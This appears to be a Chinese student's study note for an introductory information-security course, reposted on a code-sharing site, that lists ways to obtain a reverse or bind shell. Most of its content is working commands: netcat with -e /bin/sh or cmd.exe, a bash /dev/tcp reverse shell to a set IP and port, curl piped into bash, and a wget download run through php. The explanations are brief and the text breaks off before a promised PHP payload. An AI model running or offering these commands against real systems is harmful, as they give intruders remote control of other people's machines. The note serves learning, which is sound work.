1. 程式人生 > 其它 >2021-2022-1 20211407 資訊保安專業導論第三週學習總結

2021-2022-1 20211407 資訊保安專業導論第三週學習總結

netcat 一句話反彈

獲取shell(想反彈誰的shell就在誰的後面加-e /bin/sh-e /bin/bash
正向shell: 客戶端主動連線伺服器並獲取伺服器shell

客戶端主動連線並得到反彈shell    
    nc 服務端ip 8888
服務端監聽連線
    nc -lvp 8888 -e /bin/sh 
    # windows上:nc -lvp 8888 -e c:\windows\system32\cmd.exe 

反向shell: 伺服器端連線並反彈shell給客戶端

客戶端監聽
nc -lvp 8888 
服務端連線客戶端
nc 客戶端ip 8888 -e /bin/sh 
# windows上:nc ip 8888 -e c:\windows\system32\cmd.exe

bash反彈shell

bash -i >& /dev/tcp/我們靶機ip/我們靶機port 0>&1

bash一句話命令詳解
以下針對常用的bash反彈一句話進行了拆分說明,具體內容如下。

其實以上bash反彈一句完整的解讀過程就是:
bash產生了一個互動環境與本地主機主動發起與目標主機8080埠建立的連線(即TCP 8080 會話連線)相結合,然後在重定向個tcp 8080會話連線,最後將使用者鍵盤輸入與使用者標準輸出相結合再次重定向給一個標準的輸出,即得到一個bash 反彈環境。
在反彈shell時要藉助netcat工具反彈

curl反彈shell

前提要利用bash一句話的情況下使用curl反彈shell

在存在命令執行的伺服器上執行curl ip|bash,該ip的index檔案上含有bash一句話,就可以反彈shell。

例如在自己的伺服器index上寫上一句話

bash -i >& /dev/tcp/192.168.20.151/7777 0>&1

192.168.20.151就是作為監聽埠的伺服器用來得到反彈的shell。

存在一句話,利用curl反彈。
kali開啟監聽

wget方式反彈shell

利用wget進行下載執行

wget 192.168.20.130/shell.txt -O /tmp/x.php && php /tmp/x.php

利用下面貼出的php進行反彈。
開啟監聽